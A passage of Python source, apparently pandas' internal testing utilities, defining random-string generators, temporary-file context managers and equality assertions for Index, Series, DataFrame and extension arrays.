if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""
Generate an array of byte strings.
"""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""
Generate an array of unicode strings.
"""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import close as _close, get_fignums
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False, **kwargs):
"""
Gets a temporary path and agrees to remove on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
**kwargs
Additional keywords passed in for creating a temporary file.
:meth:`tempFile.TemporaryFile` is used when `return_filelike` is ``True``.
:meth:`tempfile.mkstemp` is used when `return_filelike` is ``False``.
Note that the `filename` parameter will be passed in as the `suffix`
argument to either function.
See Also
--------
tempfile.TemporaryFile
tempfile.mkstemp
"""
filename = filename or ""
fd = None
kwargs["suffix"] = filename
if return_filelike:
f = tempfile.TemporaryFile(**kwargs)
try:
yield f
finally:
f.close()
else:
# Don't generate tempfile if using a path with directory specified.
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(**kwargs)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(f"Couldn't close file descriptor: {fd} (file: {filename})")
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
"""
Get a temporary directory path and agrees to remove on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = no_default,
check_exact: bool = True,
check_categorical: bool = True,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
def _check_types(l, r, obj="Index"):
if exact:
assert_class_equal(l, r, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", l, r, obj=obj)
# allow string-like to have different inferred_types
if l.inferred_type in ("string"):
assert r.inferred_type in ("string")
else:
assert_attr_equal("inferred_type", l, r, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
level_codes = index.codes[level]
filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
values = unique._shallow_copy(filled, name=index.names[level])
return values
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = f"{obj} levels are different"
msg2 = f"{left.nlevels}, {left}"
msg3 = f"{right.nlevels}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = f"{obj} length are different"
msg2 = f"{len(left)}, {left}"
msg3 = f"{len(right)}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# MultiIndex special comparison for little-friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = f"MultiIndex level [{level}]"
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_exact=check_exact,
rtol=rtol,
atol=atol,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
rtol=rtol,
atol=atol,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left._values, right._values)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(left._values, right._values, obj=f"{obj} category")
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
"""
Checks classes are equal.
"""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
return type(x).__name__
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = f"{obj} classes are not equivalent"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = f"{obj} classes are different"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr: str, left, right, obj: str = "Attributes"):
"""
Check attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = f'Attribute "{attr}" are different'
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, "
f"type encountered {repr(type(el).__name__)}"
)
assert isinstance(el, (plt.Axes, dict)), msg
else:
msg = (
"objs is neither an ndarray of Artist instances nor a single "
"ArtistArtist instance, tuple, or dict, 'objs' is a "
f"{repr(type(objs).__name__)}"
)
assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""
Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
assert_numpy_array_equal(
left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes"
)
else:
try:
lc = left.categories.sort_values()
rc = right.categories.sort_values()
except TypeError:
# e.g. '<' not supported between instances of 'int' and 'str'
lc, rc = left.categories, right.categories
assert_index_equal(lc, rc, obj=f"{obj}.categories")
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj=f"{obj}.values",
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""
Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
assert_index_equal(left.left, right.left, exact=exact, obj=f"{obj}.left")
assert_index_equal(left.right, right.right, exact=exact, obj=f"{obj}.left")
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray"):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray"):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None, index_values=None):
__tracebackhide__ = True
msg = f"""{obj} are different
{message}"""
if isinstance(index_values, np.ndarray):
msg += f"\n[index]: {pprint_thing(index_values)}"
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg += f"""
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
index_values=None,
):
"""
Check that 'np.ndarray' is equivalent.
Parameters
----------
left, right : numpy.ndarray or iterable
The two arrays to be compared.
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype : bool, default True
Check dtype if both a and b are np.ndarray.
err_msg : str, default None
If provided, used as assertion message.
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area.
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message.
index_values : numpy.ndarray, default None
optional index (shared by both left and right), used in output.
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
elif check_same == "copy":
if left_base is right_base:
raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shapes are different", left.shape, right.shape
)
diff = 0
for l, r in zip(left, right):
# count up differences
if not array_equivalent(l, r, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right, index_values=index_values)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left,
right,
check_dtype=True,
index_values=None,
check_less_precise=no_default,
check_exact=False,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
):
"""
Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare.
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
index_values : numpy.ndarray, default None
Optional index (shared by both left and right), used in output.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default False
Whether to compare number exactly.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if (
isinstance(left, DatetimeLikeArrayMixin)
and isinstance(right, DatetimeLikeArrayMixin)
and type(right) == type(left)
):
# Avoid slow object-dtype comparisons
# np.asarray for case where we have a np.MaskedArray
assert_numpy_array_equal(
np.asarray(left.asi8), np.asarray(right.asi8), index_values=index_values
)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(
left_na, right_na, obj="ExtensionArray NA mask", index_values=index_values
)
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(
left_valid, right_valid, obj="ExtensionArray", index_values=index_values
)
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
obj="ExtensionArray",
index_values=index_values,
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=no_default,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_category_order=True,
check_freq=True,
check_flags=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_category_order : bool, default True
Whether to compare category order of internal Categoricals.
.. versionadded:: 1.0.2
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
check_flags : bool, default True
Whether to check the `flags` attribute.
.. versionadded:: 1.2.0
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = f"{len(left)}, {left.index}"
msg2 = f"{len(right)}, {right.index}"
raise_assert_detail(obj, "Series length are different", msg1, msg2)
if check_flags:
assert left.flags == right.flags, f"{repr(left.flags)} != {repr(right.flags)}"
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
if check_freq and isinstance(left.index, (pd.DatetimeIndex, pd.TimedeltaIndex)):
lidx = left.index
ridx = right.index
assert lidx.freq == ridx.freq, (lidx.freq, ridx.freq)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left.dtype)
and is_categorical_dtype(right.dtype)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
if check_exact and is_numeric_dtype(left.dtype) and is_numeric_dtype(right.dtype):
# Only check exact if dtype is numeric
assert_numpy_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif check_datetimelike_compat and (
needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype)
):
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left._values).equals(Index(right._values)):
msg = (
f"[datetimelike_compat=True] {left._values} "
f"is not equal to {right._values}."
)
raise AssertionError(msg)
elif is_interval_dtype(left.dtype) and is_interval_dtype(right.dtype):
assert_interval_array_equal(left.array, right.array)
elif is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif is_extension_array_dtype(left.dtype) and is_extension_array_dtype(right.dtype):
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
elif needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype):
# DatetimeArray or TimedeltaArray
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
else:
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(
left._values,
right._values,
obj=f"{obj} category",
check_category_order=check_category_order,
)
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=no_default,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
check_freq=True,
check_flags=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
differences. Is is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
check_flags : bool, default True
Whether to check the `flags` attribute.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas._testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}"
)
if check_like:
left, right = left.reindex_like(right), right
if check_flags:
assert left.flags == right.flags, f"{repr(left.flags)} != {repr(right.flags)}"
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.columns",
)
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
check_freq=check_freq,
obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
rtol=rtol,
atol=atol,
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
The two items to be compared.
**kwargs
All keyword arguments are passed through to the underlying assert method.
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
if isinstance(left, (pd.DatetimeIndex, pd.TimedeltaIndex)):
assert left.freq == right.freq, (left.freq, right.freq)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
assert left == right
else:
raise NotImplementedError(type(left))
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
expected = pd.array(expected)
elif box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
# for vector operations, we we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(left, right):
"""
Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
"""
_check_isinstance(left, right, pd.arrays.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
left_index = left.sp_index
right_index = right.sp_index
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
# Just ensure a
pass
assert_attr_equal("fill_value", left, right)
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense())
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, f"Did not contain item: {repr(k)}"
def assert_copy(iter1, iter2, **eql_kwargs):
"""
